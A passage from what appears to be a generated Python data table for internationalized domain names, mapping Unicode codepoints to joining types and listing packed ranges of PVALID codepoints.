0x7d4: 68,
0x7d5: 68,
0x7d6: 68,
0x7d7: 68,
0x7d8: 68,
0x7d9: 68,
0x7da: 68,
0x7db: 68,
0x7dc: 68,
0x7dd: 68,
0x7de: 68,
0x7df: 68,
0x7e0: 68,
0x7e1: 68,
0x7e2: 68,
0x7e3: 68,
0x7e4: 68,
0x7e5: 68,
0x7e6: 68,
0x7e7: 68,
0x7e8: 68,
0x7e9: 68,
0x7ea: 68,
0x7fa: 67,
0x840: 82,
0x841: 68,
0x842: 68,
0x843: 68,
0x844: 68,
0x845: 68,
0x846: 82,
0x847: 82,
0x848: 68,
0x849: 82,
0x84a: 68,
0x84b: 68,
0x84c: 68,
0x84d: 68,
0x84e: 68,
0x84f: 68,
0x850: 68,
0x851: 68,
0x852: 68,
0x853: 68,
0x854: 82,
0x855: 68,
0x856: 85,
0x857: 85,
0x858: 85,
0x860: 68,
0x861: 85,
0x862: 68,
0x863: 68,
0x864: 68,
0x865: 68,
0x866: 85,
0x867: 82,
0x868: 68,
0x869: 82,
0x86a: 82,
0x8a0: 68,
0x8a1: 68,
0x8a2: 68,
0x8a3: 68,
0x8a4: 68,
0x8a5: 68,
0x8a6: 68,
0x8a7: 68,
0x8a8: 68,
0x8a9: 68,
0x8aa: 82,
0x8ab: 82,
0x8ac: 82,
0x8ad: 85,
0x8ae: 82,
0x8af: 68,
0x8b0: 68,
0x8b1: 82,
0x8b2: 82,
0x8b3: 68,
0x8b4: 68,
0x8b6: 68,
0x8b7: 68,
0x8b8: 68,
0x8b9: 82,
0x8ba: 68,
0x8bb: 68,
0x8bc: 68,
0x8bd: 68,
0x8e2: 85,
0x1806: 85,
0x1807: 68,
0x180a: 67,
0x180e: 85,
0x1820: 68,
0x1821: 68,
0x1822: 68,
0x1823: 68,
0x1824: 68,
0x1825: 68,
0x1826: 68,
0x1827: 68,
0x1828: 68,
0x1829: 68,
0x182a: 68,
0x182b: 68,
0x182c: 68,
0x182d: 68,
0x182e: 68,
0x182f: 68,
0x1830: 68,
0x1831: 68,
0x1832: 68,
0x1833: 68,
0x1834: 68,
0x1835: 68,
0x1836: 68,
0x1837: 68,
0x1838: 68,
0x1839: 68,
0x183a: 68,
0x183b: 68,
0x183c: 68,
0x183d: 68,
0x183e: 68,
0x183f: 68,
0x1840: 68,
0x1841: 68,
0x1842: 68,
0x1843: 68,
0x1844: 68,
0x1845: 68,
0x1846: 68,
0x1847: 68,
0x1848: 68,
0x1849: 68,
0x184a: 68,
0x184b: 68,
0x184c: 68,
0x184d: 68,
0x184e: 68,
0x184f: 68,
0x1850: 68,
0x1851: 68,
0x1852: 68,
0x1853: 68,
0x1854: 68,
0x1855: 68,
0x1856: 68,
0x1857: 68,
0x1858: 68,
0x1859: 68,
0x185a: 68,
0x185b: 68,
0x185c: 68,
0x185d: 68,
0x185e: 68,
0x185f: 68,
0x1860: 68,
0x1861: 68,
0x1862: 68,
0x1863: 68,
0x1864: 68,
0x1865: 68,
0x1866: 68,
0x1867: 68,
0x1868: 68,
0x1869: 68,
0x186a: 68,
0x186b: 68,
0x186c: 68,
0x186d: 68,
0x186e: 68,
0x186f: 68,
0x1870: 68,
0x1871: 68,
0x1872: 68,
0x1873: 68,
0x1874: 68,
0x1875: 68,
0x1876: 68,
0x1877: 68,
0x1878: 68,
0x1880: 85,
0x1881: 85,
0x1882: 85,
0x1883: 85,
0x1884: 85,
0x1885: 84,
0x1886: 84,
0x1887: 68,
0x1888: 68,
0x1889: 68,
0x188a: 68,
0x188b: 68,
0x188c: 68,
0x188d: 68,
0x188e: 68,
0x188f: 68,
0x1890: 68,
0x1891: 68,
0x1892: 68,
0x1893: 68,
0x1894: 68,
0x1895: 68,
0x1896: 68,
0x1897: 68,
0x1898: 68,
0x1899: 68,
0x189a: 68,
0x189b: 68,
0x189c: 68,
0x189d: 68,
0x189e: 68,
0x189f: 68,
0x18a0: 68,
0x18a1: 68,
0x18a2: 68,
0x18a3: 68,
0x18a4: 68,
0x18a5: 68,
0x18a6: 68,
0x18a7: 68,
0x18a8: 68,
0x18aa: 68,
0x200c: 85,
0x200d: 67,
0x202f: 85,
0x2066: 85,
0x2067: 85,
0x2068: 85,
0x2069: 85,
0xa840: 68,
0xa841: 68,
0xa842: 68,
0xa843: 68,
0xa844: 68,
0xa845: 68,
0xa846: 68,
0xa847: 68,
0xa848: 68,
0xa849: 68,
0xa84a: 68,
0xa84b: 68,
0xa84c: 68,
0xa84d: 68,
0xa84e: 68,
0xa84f: 68,
0xa850: 68,
0xa851: 68,
0xa852: 68,
0xa853: 68,
0xa854: 68,
0xa855: 68,
0xa856: 68,
0xa857: 68,
0xa858: 68,
0xa859: 68,
0xa85a: 68,
0xa85b: 68,
0xa85c: 68,
0xa85d: 68,
0xa85e: 68,
0xa85f: 68,
0xa860: 68,
0xa861: 68,
0xa862: 68,
0xa863: 68,
0xa864: 68,
0xa865: 68,
0xa866: 68,
0xa867: 68,
0xa868: 68,
0xa869: 68,
0xa86a: 68,
0xa86b: 68,
0xa86c: 68,
0xa86d: 68,
0xa86e: 68,
0xa86f: 68,
0xa870: 68,
0xa871: 68,
0xa872: 76,
0xa873: 85,
0x10ac0: 68,
0x10ac1: 68,
0x10ac2: 68,
0x10ac3: 68,
0x10ac4: 68,
0x10ac5: 82,
0x10ac6: 85,
0x10ac7: 82,
0x10ac8: 85,
0x10ac9: 82,
0x10aca: 82,
0x10acb: 85,
0x10acc: 85,
0x10acd: 76,
0x10ace: 82,
0x10acf: 82,
0x10ad0: 82,
0x10ad1: 82,
0x10ad2: 82,
0x10ad3: 68,
0x10ad4: 68,
0x10ad5: 68,
0x10ad6: 68,
0x10ad7: 76,
0x10ad8: 68,
0x10ad9: 68,
0x10ada: 68,
0x10adb: 68,
0x10adc: 68,
0x10add: 82,
0x10ade: 68,
0x10adf: 68,
0x10ae0: 68,
0x10ae1: 82,
0x10ae2: 85,
0x10ae3: 85,
0x10ae4: 82,
0x10aeb: 68,
0x10aec: 68,
0x10aed: 68,
0x10aee: 68,
0x10aef: 82,
0x10b80: 68,
0x10b81: 82,
0x10b82: 68,
0x10b83: 82,
0x10b84: 82,
0x10b85: 82,
0x10b86: 68,
0x10b87: 68,
0x10b88: 68,
0x10b89: 82,
0x10b8a: 68,
0x10b8b: 68,
0x10b8c: 82,
0x10b8d: 68,
0x10b8e: 82,
0x10b8f: 82,
0x10b90: 68,
0x10b91: 82,
0x10ba9: 82,
0x10baa: 82,
0x10bab: 82,
0x10bac: 82,
0x10bad: 68,
0x10bae: 68,
0x10baf: 85,
0x10d00: 76,
0x10d01: 68,
0x10d02: 68,
0x10d03: 68,
0x10d04: 68,
0x10d05: 68,
0x10d06: 68,
0x10d07: 68,
0x10d08: 68,
0x10d09: 68,
0x10d0a: 68,
0x10d0b: 68,
0x10d0c: 68,
0x10d0d: 68,
0x10d0e: 68,
0x10d0f: 68,
0x10d10: 68,
0x10d11: 68,
0x10d12: 68,
0x10d13: 68,
0x10d14: 68,
0x10d15: 68,
0x10d16: 68,
0x10d17: 68,
0x10d18: 68,
0x10d19: 68,
0x10d1a: 68,
0x10d1b: 68,
0x10d1c: 68,
0x10d1d: 68,
0x10d1e: 68,
0x10d1f: 68,
0x10d20: 68,
0x10d21: 68,
0x10d22: 82,
0x10d23: 68,
0x10f30: 68,
0x10f31: 68,
0x10f32: 68,
0x10f33: 82,
0x10f34: 68,
0x10f35: 68,
0x10f36: 68,
0x10f37: 68,
0x10f38: 68,
0x10f39: 68,
0x10f3a: 68,
0x10f3b: 68,
0x10f3c: 68,
0x10f3d: 68,
0x10f3e: 68,
0x10f3f: 68,
0x10f40: 68,
0x10f41: 68,
0x10f42: 68,
0x10f43: 68,
0x10f44: 68,
0x10f45: 85,
0x10f51: 68,
0x10f52: 68,
0x10f53: 68,
0x10f54: 82,
0x110bd: 85,
0x110cd: 85,
0x1e900: 68,
0x1e901: 68,
0x1e902: 68,
0x1e903: 68,
0x1e904: 68,
0x1e905: 68,
0x1e906: 68,
0x1e907: 68,
0x1e908: 68,
0x1e909: 68,
0x1e90a: 68,
0x1e90b: 68,
0x1e90c: 68,
0x1e90d: 68,
0x1e90e: 68,
0x1e90f: 68,
0x1e910: 68,
0x1e911: 68,
0x1e912: 68,
0x1e913: 68,
0x1e914: 68,
0x1e915: 68,
0x1e916: 68,
0x1e917: 68,
0x1e918: 68,
0x1e919: 68,
0x1e91a: 68,
0x1e91b: 68,
0x1e91c: 68,
0x1e91d: 68,
0x1e91e: 68,
0x1e91f: 68,
0x1e920: 68,
0x1e921: 68,
0x1e922: 68,
0x1e923: 68,
0x1e924: 68,
0x1e925: 68,
0x1e926: 68,
0x1e927: 68,
0x1e928: 68,
0x1e929: 68,
0x1e92a: 68,
0x1e92b: 68,
0x1e92c: 68,
0x1e92d: 68,
0x1e92e: 68,
0x1e92f: 68,
0x1e930: 68,
0x1e931: 68,
0x1e932: 68,
0x1e933: 68,
0x1e934: 68,
0x1e935: 68,
0x1e936: 68,
0x1e937: 68,
0x1e938: 68,
0x1e939: 68,
0x1e93a: 68,
0x1e93b: 68,
0x1e93c: 68,
0x1e93d: 68,
0x1e93e: 68,
0x1e93f: 68,
0x1e940: 68,
0x1e941: 68,
0x1e942: 68,
0x1e943: 68,
}
codepoint_classes = {
'PVALID': (
0x2d0000002e,
0x300000003a,
0x610000007b,
0xdf000000f7,
0xf800000100,
0x10100000102,
0x10300000104,
0x10500000106,
0x10700000108,
0x1090000010a,
0x10b0000010c,
0x10d0000010e,
0x10f00000110,
0x11100000112,
0x11300000114,
0x11500000116,
0x11700000118,
0x1190000011a,
0x11b0000011c,
0x11d0000011e,
0x11f00000120,
0x12100000122,
0x12300000124,
0x12500000126,
0x12700000128,
0x1290000012a,
0x12b0000012c,
0x12d0000012e,
0x12f00000130,
0x13100000132,
0x13500000136,
0x13700000139,
0x13a0000013b,
0x13c0000013d,
0x13e0000013f,
0x14200000143,
0x14400000145,
0x14600000147,
0x14800000149,
0x14b0000014c,
0x14d0000014e,
0x14f00000150,
0x15100000152,
0x15300000154,
0x15500000156,
0x15700000158,
0x1590000015a,
0x15b0000015c,
0x15d0000015e,
0x15f00000160,
0x16100000162,
0x16300000164,
0x16500000166,
0x16700000168,
0x1690000016a,
0x16b0000016c,
0x16d0000016e,
0x16f00000170,
0x17100000172,
0x17300000174,
0x17500000176,
0x17700000178,
0x17a0000017b,
0x17c0000017d,
0x17e0000017f,
0x18000000181,
0x18300000184,
0x18500000186,
0x18800000189,
0x18c0000018e,
0x19200000193,
0x19500000196,
0x1990000019c,
0x19e0000019f,
0x1a1000001a2,
0x1a3000001a4,
0x1a5000001a6,
0x1a8000001a9,
0x1aa000001ac,
0x1ad000001ae,
0x1b0000001b1,
0x1b4000001b5,
0x1b6000001b7,
0x1b9000001bc,
0x1bd000001c4,
0x1ce000001cf,
0x1d0000001d1,
0x1d2000001d3,
0x1d4000001d5,
0x1d6000001d7,
0x1d8000001d9,
0x1da000001db,
0x1dc000001de,
0x1df000001e0,
0x1e1000001e2,
0x1e3000001e4,
0x1e5000001e6,
0x1e7000001e8,
0x1e9000001ea,
0x1eb000001ec,
0x1ed000001ee,
0x1ef000001f1,
0x1f5000001f6,
0x1f9000001fa,
0x1fb000001fc,
0x1fd000001fe,
0x1ff00000200,
0x20100000202,
0x20300000204,
0x20500000206,
0x20700000208,
0x2090000020a,
0x20b0000020c,
0x20d0000020e,
0x20f00000210,
0x21100000212,
0x21300000214,
0x21500000216,
0x21700000218,
0x2190000021a,
0x21b0000021c,
0x21d0000021e,
0x21f00000220,
0x22100000222,
0x22300000224,
0x22500000226,
0x22700000228,
0x2290000022a,
0x22b0000022c,
0x22d0000022e,
0x22f00000230,
0x23100000232,
0x2330000023a,
0x23c0000023d,
0x23f00000241,
0x24200000243,
0x24700000248,
0x2490000024a,
0x24b0000024c,
0x24d0000024e,
0x24f000002b0,
0x2b9000002c2,
0x2c6000002d2,
0x2ec000002ed,
0x2ee000002ef,
0x30000000340,
0x34200000343,
0x3460000034f,
0x35000000370,
0x37100000372,
0x37300000374,
0x37700000378,
0x37b0000037e,
0x39000000391,
0x3ac000003cf,
0x3d7000003d8,
0x3d9000003da,
0x3db000003dc,
0x3dd000003de,
0x3df000003e0,
0x3e1000003e2,
0x3e3000003e4,
0x3e5000003e6,
0x3e7000003e8,
0x3e9000003ea,
0x3eb000003ec,
0x3ed000003ee,
0x3ef000003f0,
0x3f3000003f4,
0x3f8000003f9,
0x3fb000003fd,
0x43000000460,
0x46100000462,
0x46300000464,
0x46500000466,
0x46700000468,
0x4690000046a,
0x46b0000046c,
0x46d0000046e,
0x46f00000470,
0x47100000472,
0x47300000474,
0x47500000476,
0x47700000478,
0x4790000047a,
0x47b0000047c,
0x47d0000047e,
0x47f00000480,
0x48100000482,
0x48300000488,
0x48b0000048c,
0x48d0000048e,
0x48f00000490,
0x49100000492,
0x49300000494,
0x49500000496,
0x49700000498,
0x4990000049a,
0x49b0000049c,
0x49d0000049e,
0x49f000004a0,
0x4a1000004a2,
0x4a3000004a4,
0x4a5000004a6,
0x4a7000004a8,
0x4a9000004aa,
0x4ab000004ac,
0x4ad000004ae,
0x4af000004b0,
0x4b1000004b2,
0x4b3000004b4,
0x4b5000004b6,
0x4b7000004b8,
0x4b9000004ba,
0x4bb000004bc,
0x4bd000004be,
0x4bf000004c0,
0x4c2000004c3,
0x4c4000004c5,
0x4c6000004c7,
0x4c8000004c9,
0x4ca000004cb,
0x4cc000004cd,
0x4ce000004d0,
0x4d1000004d2,
0x4d3000004d4,
0x4d5000004d6,
0x4d7000004d8,
0x4d9000004da,
0x4db000004dc,
0x4dd000004de,
0x4df000004e0,
0x4e1000004e2,
0x4e3000004e4,
0x4e5000004e6,
0x4e7000004e8,
0x4e9000004ea,
0x4eb000004ec,
0x4ed000004ee,
0x4ef000004f0,
0x4f1000004f2,
0x4f3000004f4,
0x4f5000004f6,
0x4f7000004f8,
0x4f9000004fa,
0x4fb000004fc,
0x4fd000004fe,
0x4ff00000500,
0x50100000502,
0x50300000504,
0x50500000506,
0x50700000508,
0x5090000050a,
0x50b0000050c,
0x50d0000050e,
0x50f00000510,
0x51100000512,
0x51300000514,
0x51500000516,
0x51700000518,
0x5190000051a,
0x51b0000051c,
0x51d0000051e,
0x51f00000520,
0x52100000522,
0x52300000524,
0x52500000526,
0x52700000528,
0x5290000052a,
0x52b0000052c,
0x52d0000052e,
0x52f00000530,
0x5590000055a,
0x56000000587,
0x58800000589,
0x591000005be,
0x5bf000005c0,
0x5c1000005c3,
0x5c4000005c6,
0x5c7000005c8,
0x5d0000005eb,
0x5ef000005f3,
0x6100000061b,
0x62000000640,
0x64100000660,
0x66e00000675,
0x679000006d4,
0x6d5000006dd,
0x6df000006e9,
0x6ea000006f0,
0x6fa00000700,
0x7100000074b,
0x74d000007b2,
0x7c0000007f6,
0x7fd000007fe,
0x8000000082e,
0x8400000085c,
0x8600000086b,
0x8a0000008b5,
0x8b6000008be,
0x8d3000008e2,
0x8e300000958,
0x96000000964,
0x96600000970,
0x97100000984,
0x9850000098d,
0x98f00000991,
0x993000009a9,
0x9aa000009b1,
0x9b2000009b3,
0x9b6000009ba,
0x9bc000009c5,
0x9c7000009c9,
0x9cb000009cf,
0x9d7000009d8,
0x9e0000009e4,
0x9e6000009f2,
0x9fc000009fd,
0x9fe000009ff,
0xa0100000a04,
0xa0500000a0b,
0xa0f00000a11,
0xa1300000a29,
0xa2a00000a31,
0xa3200000a33,
0xa3500000a36,
0xa3800000a3a,
0xa3c00000a3d,
0xa3e00000a43,
0xa4700000a49,
0xa4b00000a4e,
0xa5100000a52,
0xa5c00000a5d,
0xa6600000a76,
0xa8100000a84,
0xa8500000a8e,
0xa8f00000a92,
0xa9300000aa9,
0xaaa00000ab1,
0xab200000ab4,
0xab500000aba,
0xabc00000ac6,
0xac700000aca,
0xacb00000ace,
0xad000000ad1,
0xae000000ae4,
0xae600000af0,
0xaf900000b00,
0xb0100000b04,
0xb0500000b0d,
0xb0f00000b11,
0xb1300000b29,
0xb2a00000b31,
0xb3200000b34,
0xb3500000b3a,
0xb3c00000b45,
0xb4700000b49,
0xb4b00000b4e,
0xb5600000b58,
0xb5f00000b64,
0xb6600000b70,
0xb7100000b72,
0xb8200000b84,
0xb8500000b8b,
0xb8e00000b91,
0xb9200000b96,
0xb9900000b9b,
0xb9c00000b9d,
0xb9e00000ba0,
0xba300000ba5,
0xba800000bab,
0xbae00000bba,
0xbbe00000bc3,
0xbc600000bc9,
0xbca00000bce,
0xbd000000bd1,
0xbd700000bd8,
0xbe600000bf0,
0xc0000000c0d,
0xc0e00000c11,
0xc1200000c29,
0xc2a00000c3a,
0xc3d00000c45,
0xc4600000c49,
0xc4a00000c4e,
0xc5500000c57,
0xc5800000c5b,
0xc6000000c64,
0xc6600000c70,
0xc8000000c84,
0xc8500000c8d,
0xc8e00000c91,
0xc9200000ca9,
0xcaa00000cb4,
0xcb500000cba,
0xcbc00000cc5,
0xcc600000cc9,
0xcca00000cce,
0xcd500000cd7,
0xcde00000cdf,
0xce000000ce4,
0xce600000cf0,
0xcf100000cf3,
0xd0000000d04,
0xd0500000d0d,
0xd0e00000d11,
0xd1200000d45,
0xd4600000d49,
0xd4a00000d4f,
0xd5400000d58,
0xd5f00000d64,
0xd6600000d70,
0xd7a00000d80,
0xd8200000d84,
0xd8500000d97,
0xd9a00000db2,
0xdb300000dbc,
0xdbd00000dbe,
0xdc000000dc7,
0xdca00000dcb,
0xdcf00000dd5,
0xdd600000dd7,
0xdd800000de0,
0xde600000df0,
0xdf200000df4,
0xe0100000e33,
0xe3400000e3b,
0xe4000000e4f,
0xe5000000e5a,
0xe8100000e83,
0xe8400000e85,
0xe8700000e89,
0xe8a00000e8b,
0xe8d00000e8e,
0xe9400000e98,
0xe9900000ea0,
0xea100000ea4,
0xea500000ea6,
0xea700000ea8,
0xeaa00000eac,
0xead00000eb3,
0xeb400000eba,
0xebb00000ebe,
0xec000000ec5,
0xec600000ec7,
0xec800000ece,
0xed000000eda,
0xede00000ee0,
0xf0000000f01,
0xf0b00000f0c,
0xf1800000f1a,
0xf2000000f2a,
0xf3500000f36,
0xf3700000f38,
0xf3900000f3a,
0xf3e00000f43,
0xf4400000f48,
0xf4900000f4d,
0xf4e00000f52,
0xf5300000f57,
0xf5800000f5c,
0xf5d00000f69,
0xf6a00000f6d,
0xf7100000f73,
0xf7400000f75,
0xf7a00000f81,
0xf8200000f85,
0xf8600000f93,
0xf9400000f98,
0xf9900000f9d,
0xf9e00000fa2,
0xfa300000fa7,
0xfa800000fac,
0xfad00000fb9,
0xfba00000fbd,
0xfc600000fc7,
0x10000000104a,
0x10500000109e,
0x10d0000010fb,
0x10fd00001100,
0x120000001249,
0x124a0000124e,
0x125000001257,
0x125800001259,
0x125a0000125e,
0x126000001289,
0x128a0000128e,
0x1290000012b1,
0x12b2000012b6,
0x12b8000012bf,
0x12c0000012c1,
0x12c2000012c6,
0x12c8000012d7,
0x12d800001311,
0x131200001316,
0x13180000135b,
0x135d00001360,
0x138000001390,
0x13a0000013f6,
0x14010000166d,
0x166f00001680,
0x16810000169b,
0x16a0000016eb,
0x16f1000016f9,
0x17000000170d,
0x170e00001715,
0x172000001735,
0x174000001754,
0x17600000176d,
0x176e00001771,
0x177200001774,
0x1780000017b4,
0x17b6000017d4,
0x17d7000017d8,
0x17dc000017de,
0x17e0000017ea,
0x18100000181a,
0x182000001879,
0x1880000018ab,
0x18b0000018f6,
0x19000000191f,
0x19200000192c,
0x19300000193c,
0x19460000196e,
0x197000001975,
0x1980000019ac,
0x19b0000019ca,
0x19d0000019da,
0x1a0000001a1c,
0x1a2000001a5f,
0x1a6000001a7d,
0x1a7f00001a8a,
0x1a9000001a9a,
0x1aa700001aa8,
0x1ab000001abe,
0x1b0000001b4c,
0x1b5000001b5a,
0x1b6b00001b74,
0x1b8000001bf4,
0x1c0000001c38,
0x1c4000001c4a,
0x1c4d00001c7e,
0x1cd000001cd3,
0x1cd400001cfa,
0x1d0000001d2c,
0x1d2f00001d30,
0x1d3b00001d3c,
0x1d4e00001d4f,
0x1d6b00001d78,
0x1d7900001d9b,
0x1dc000001dfa,
0x1dfb00001e00,
0x1e0100001e02,
0x1e0300001e04,
0x1e0500001e06,
0x1e0700001e08,
0x1e0900001e0a,
0x1e0b00001e0c,
0x1e0d00001e0e,
0x1e0f00001e10,
0x1e1100001e12,
0x1e1300001e14,
0x1e1500001e16,
0x1e1700001e18,
0x1e1900001e1a,
0x1e1b00001e1c,
0x1e1d00001e1e,
0x1e1f00001e20,
0x1e2100001e22,
0x1e2300001e24,
0x1e2500001e26,
0x1e2700001e28,
0x1e2900001e2a,
0x1e2b00001e2c,
0x1e2d00001e2e,
0x1e2f00001e30,
0x1e3100001e32,
0x1e3300001e34,
0x1e3500001e36,
0x1e3700001e38,
0x1e3900001e3a,
0x1e3b00001e3c,
0x1e3d00001e3e,
0x1e3f00001e40,
0x1e4100001e42,
0x1e4300001e44,
0x1e4500001e46,
0x1e4700001e48,
0x1e4900001e4a,
0x1e4b00001e4c,
0x1e4d00001e4e,
0x1e4f00001e50,
0x1e5100001e52,
0x1e5300001e54,
0x1e5500001e56,
0x1e5700001e58,
0x1e5900001e5a,
0x1e5b00001e5c,
0x1e5d00001e5e,
0x1e5f00001e60,
0x1e6100001e62,
0x1e6300001e64,
0x1e6500001e66,
0x1e6700001e68,
0x1e6900001e6a,
0x1e6b00001e6c,
0x1e6d00001e6e,
0x1e6f00001e70,
0x1e7100001e72,
0x1e7300001e74,
0x1e7500001e76,
0x1e7700001e78,
0x1e7900001e7a,
0x1e7b00001e7c,
0x1e7d00001e7e,
0x1e7f00001e80,
0x1e8100001e82,
0x1e8300001e84,
0x1e8500001e86,
0x1e8700001e88,
0x1e8900001e8a,
0x1e8b00001e8c,
0x1e8d00001e8e,
0x1e8f00001e90,
0x1e9100001e92,
0x1e9300001e94,
0x1e9500001e9a,
0x1e9c00001e9e,
0x1e9f00001ea0,
0x1ea100001ea2,
0x1ea300001ea4,
0x1ea500001ea6,
0x1ea700001ea8,
0x1ea900001eaa,
0x1eab00001eac,
0x1ead00001eae,
0x1eaf00001eb0,
0x1eb100001eb2,
0x1eb300001eb4,
0x1eb500001eb6,
0x1eb700001eb8,
0x1eb900001eba,
0x1ebb00001ebc,
0x1ebd00001ebe,
0x1ebf00001ec0,
0x1ec100001ec2,
0x1ec300001ec4,
0x1ec500001ec6,
0x1ec700001ec8,
0x1ec900001eca,
0x1ecb00001ecc,
0x1ecd00001ece,
0x1ecf00001ed0,
0x1ed100001ed2,
0x1ed300001ed4,
0x1ed500001ed6,
0x1ed700001ed8,
0x1ed900001eda,
0x1edb00001edc,
0x1edd00001ede,
0x1edf00001ee0,
0x1ee100001ee2,
0x1ee300001ee4,
0x1ee500001ee6,
0x1ee700001ee8,
0x1ee900001eea,
0x1eeb00001eec,
0x1eed00001eee,
0x1eef00001ef0,
0x1ef100001ef2,
0x1ef300001ef4,
0x1ef500001ef6,
0x1ef700001ef8,
0x1ef900001efa,
0x1efb00001efc,
0x1efd00001efe,
0x1eff00001f08,
0x1f1000001f16,
0x1f2000001f28,
0x1f3000001f38,
0x1f4000001f46,
0x1f5000001f58,
0x1f6000001f68,
0x1f7000001f71,
0x1f7200001f73,
0x1f7400001f75,
0x1f7600001f77,
0x1f7800001f79,
0x1f7a00001f7b,
0x1f7c00001f7d,
0x1fb000001fb2,
0x1fb600001fb7,
0x1fc600001fc7,
0x1fd000001fd3,
0x1fd600001fd8,
0x1fe000001fe3,
0x1fe400001fe8,
0x1ff600001ff7,
0x214e0000214f,
0x218400002185,
0x2c3000002c5f,
0x2c6100002c62,
0x2c6500002c67,
0x2c6800002c69,
0x2c6a00002c6b,
0x2c6c00002c6d,
0x2c7100002c72,
0x2c7300002c75,
0x2c7600002c7c,
0x2c8100002c82,
0x2c8300002c84,
0x2c8500002c86,
0x2c8700002c88,
0x2c8900002c8a,
0x2c8b00002c8c,
0x2c8d00002c8e,
0x2c8f00002c90,
0x2c9100002c92,
0x2c9300002c94,
0x2c9500002c96,
0x2c9700002c98,
0x2c9900002c9a,
0x2c9b00002c9c,
0x2c9d00002c9e,
0x2c9f00002ca0,
0x2ca100002ca2,
0x2ca300002ca4,
0x2ca500002ca6,
0x2ca700002ca8,
0x2ca900002caa,
0x2cab00002cac,
0x2cad00002cae,
0x2caf00002cb0,
0x2cb100002cb2,
0x2cb300002cb4,
0x2cb500002cb6,
0x2cb700002cb8,
0x2cb900002cba,
0x2cbb00002cbc,
0x2cbd00002cbe,
0x2cbf00002cc0,
0x2cc100002cc2,
0x2cc300002cc4,
0x2cc500002cc6,
0x2cc700002cc8,
0x2cc900002cca,
0x2ccb00002ccc,
0x2ccd00002cce,
0x2ccf00002cd0,
0x2cd100002cd2,
0x2cd300002cd4,
0x2cd500002cd6,
0x2cd700002cd8,
0x2cd900002cda,
0x2cdb00002cdc,
0x2cdd00002cde,
0x2cdf00002ce0,
0x2ce100002ce2,
0x2ce300002ce5,
0x2cec00002ced,
0x2cee00002cf2,
0x2cf300002cf4,
0x2d0000002d26,
0x2d2700002d28,
0x2d2d00002d2e,
0x2d3000002d68,
0x2d7f00002d97,
0x2da000002da7,
0x2da800002daf,
0x2db000002db7,
0x2db800002dbf,
0x2dc000002dc7,
0x2dc800002dcf,
0x2dd000002dd7,
0x2dd800002ddf,
0x2de000002e00,
0x2e2f00002e30,
0x300500003008,
0x302a0000302e,
0x303c0000303d,
0x304100003097,
0x30990000309b,
0x309d0000309f,
0x30a1000030fb,
0x30fc000030ff,
0x310500003130,
0x31a0000031bb,
0x31f000003200,
0x340000004db6,
0x4e0000009ff0,
0xa0000000a48d,
0xa4d00000a4fe,
0xa5000000a60d,
0xa6100000a62c,
0xa6410000a642,
0xa6430000a644,
0xa6450000a646,
0xa6470000a648,
0xa6490000a64a,
0xa64b0000a64c,
0xa64d0000a64e,
0xa64f0000a650,
0xa6510000a652,
0xa6530000a654,
0xa6550000a656,
0xa6570000a658,
0xa6590000a65a,
0xa65b0000a65c,
0xa65d0000a65e,
0xa65f0000a660,
0xa6610000a662,
0xa6630000a664,
0xa6650000a666,
0xa6670000a668,
0xa6690000a66a,
0xa66b0000a66c,
0xa66d0000a670,
0xa6740000a67e,
0xa67f0000a680,
0xa6810000a682,
0xa6830000a684,
0xa6850000a686,
0xa6870000a688,
0xa6890000a68a,
0xa68b0000a68c,
0xa68d0000a68e,
0xa68f0000a690,
0xa6910000a692,
0xa6930000a694,
0xa6950000a696,
0xa6970000a698,
0xa6990000a69a,
0xa69b0000a69c,
0xa69e0000a6e6,
0xa6f00000a6f2,
0xa7170000a720,
0xa7230000a724,
0xa7250000a726,
0xa7270000a728,
0xa7290000a72a,
0xa72b0000a72c,
0xa72d0000a72e,
0xa72f0000a732,
0xa7330000a734,
0xa7350000a736,
0xa7370000a738,
0xa7390000a73a,
0xa73b0000a73c,
0xa73d0000a73e,
0xa73f0000a740,
0xa7410000a742,
0xa7430000a744,
0xa7450000a746,
0xa7470000a748,
0xa7490000a74a,
0xa74b0000a74c,
0xa74d0000a74e,
0xa74f0000a750,
0xa7510000a752,
0xa7530000a754,
0xa7550000a756,
0xa7570000a758,
0xa7590000a75a,
0xa75b0000a75c,
0xa75d0000a75e,
0xa75f0000a760,
0xa7610000a762,
0xa7630000a764,
0xa7650000a766,
0xa7670000a768,
0xa7690000a76a,
0xa76b0000a76c,
0xa76d0000a76e,
0xa76f0000a770,
0xa7710000a779,
0xa77a0000a77b,
0xa77c0000a77d,
0xa77f0000a780,
0xa7810000a782,
0xa7830000a784,
0xa7850000a786,
0xa7870000a789,
0xa78c0000a78d,
0xa78e0000a790,
0xa7910000a792,
0xa7930000a796,
0xa7970000a798,
0xa7990000a79a,
0xa79b0000a79c,
0xa79d0000a79e,
0xa79f0000a7a0,
0xa7a10000a7a2,
0xa7a30000a7a4,
0xa7a50000a7a6,
0xa7a70000a7a8,
0xa7a90000a7aa,
0xa7af0000a7b0,
0xa7b50000a7b6,
0xa7b70000a7b8,
0xa7b90000a7ba,
0xa7f70000a7f8,
0xa7fa0000a828,
0xa8400000a874,
0xa8800000a8c6,
0xa8d00000a8da,
0xa8e00000a8f8,
0xa8fb0000a8fc,
0xa8fd0000a92e,
0xa9300000a954,
0xa9800000a9c1,
0xa9cf0000a9da,
0xa9e00000a9ff,
0xaa000000aa37,
0xaa400000aa4e,
0xaa500000aa5a,
0xaa600000aa77,
0xaa7a0000aac3,
0xaadb0000aade,
0xaae00000aaf0,
0xaaf20000aaf7,
0xab010000ab07,
0xab090000ab0f,
0xab110000ab17,
0xab200000ab27,
0xab280000ab2f,
0xab300000ab5b,
0xab600000ab66,
0xabc00000abeb,
0xabec0000abee,
0xabf00000abfa,
0xac000000d7a4,
0xfa0e0000fa10,
0xfa110000fa12,
0xfa130000fa15,
0xfa1f0000fa20,
0xfa210000fa22,
0xfa230000fa25,
0xfa270000fa2a,
0xfb1e0000fb1f,
0xfe200000fe30,
0xfe730000fe74,
0x100000001000c,
0x1000d00010027,
0x100280001003b,
0x1003c0001003e,
0x1003f0001004e,
0x100500001005e,
0x10080000100fb,
0x101fd000101fe,
0x102800001029d,
0x102a0000102d1,
0x102e0000102e1,
0x1030000010320,
0x1032d00010341,
0x103420001034a,
0x103500001037b,
0x103800001039e,
0x103a0000103c4,
0x103c8000103d0,
0x104280001049e,
0x104a0000104aa,
0x104d8000104fc,
0x1050000010528,
0x1053000010564,
0x1060000010737,
0x1074000010756,
0x1076000010768,
0x1080000010806,
0x1080800010809,
0x1080a00010836,
0x1083700010839,
0x1083c0001083d,
0x1083f00010856,
0x1086000010877,
0x108800001089f,
0x108e0000108f3,
